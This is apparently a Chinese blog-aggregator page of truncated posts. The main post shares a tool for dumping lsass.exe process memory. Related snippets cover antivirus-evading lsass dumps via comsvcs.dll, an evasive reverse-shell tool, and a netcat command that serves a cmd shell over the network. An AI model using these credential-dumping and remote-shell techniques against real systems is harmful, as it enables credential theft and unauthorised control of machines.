記一次服務器病毒查殺過程:lsass.exe占用內存高
前幾天,一大早上班就被用戶單位在群里呼叫,說系統登不上去了。我自己試了一下,Web站點能夠訪問,想上服務器上看看日志上是不是有什么問題。誰知道服務器遠程桌面一直無法連接。只能找基礎設施同 ...
原文:分享一個轉儲lsass.exe進程的工具
dump lsass for Win x .c 和 dump lsass for Win x .c 是國外一位大佬寫的專門轉儲lsass.exe進程的工具 參考鏈接:https: osandamalith.com shellcode to dump the lsass process procdump.exe 是微軟官方的進程轉儲工具,設計初衷是抓取崩潰進程的內存數據 下載地址:https: do ...
2019-07-26 13:54 0 550 推薦指數:
相關推薦
Dump Lsass內存轉儲新舊方法
之前看到一篇關於Lsass內存dump的文章,學習記錄一下。 lsass.exe(Local Security Authority Subsystem Service)進程空間中,存有着機器的域、本地用戶名和密碼等重要信息。如果獲取本地高權限,用戶便可以訪問 LSASS 進程內存 ...
comsvcs.dll轉儲lsass(過360衛士&火絨)
簡介 實際使用 用api調或者看進程都可以 ...
分享一個免殺的反彈shell工具(python腳本轉換成exe)
有時候網站服務器上有殺毒軟件,我們上傳的nc.exe、lcx.exe等工具都被殺了,這時候就需要一款免殺的工具來反彈shell。 這篇博客主要是依據國外的一片文章翻譯而來,根據國外大佬的教程將Python腳本轉換成exe程序即可免殺。 參考鏈接:https://medium.com ...
分享一個免殺的netcat.exe
: netcat -l -p 443 第2步: 內網服務器執行: netcat.exe -t -e cmd.e ...
分享自己做的一個指定進程以及線程長時間cpu監控的工具
前言: 前面給大家分享過一個工作中用到的編譯拷貝腳本,其實工作中還有一些其他工具的使用,今天再來分享一個自己純手工的CPU監控的腳本。大家可以結合上篇文章與本篇文章一起學習shell。 主要實現功能: 1.監控指定進程是否運行 2.讀取該進程所在當前CPU的占用率,5s一次 ...
分享一個批量ping工具
一款來自於NirSoft的批量ping軟件,可以同時ping多個不同的ip地址。 單擊"ping操作選項" "粘貼OR輸入ip地址" 主界面就可以看到 ...
Visual Studio遠程調試監視器(MSVSMON.EXE)的32位版本不能用於調試64位進程或64位轉儲
在VS2013中調試Silverlight項目時,提示:無法附加。Visual Studio遠程調試監視器(MSVSMON.EXE)的32位版本不能用於調試64位進程或64位轉儲。請改用64位版本。 解決方法很簡單: 把調試按鈕的調試程序Internet Explorer改成Internet ...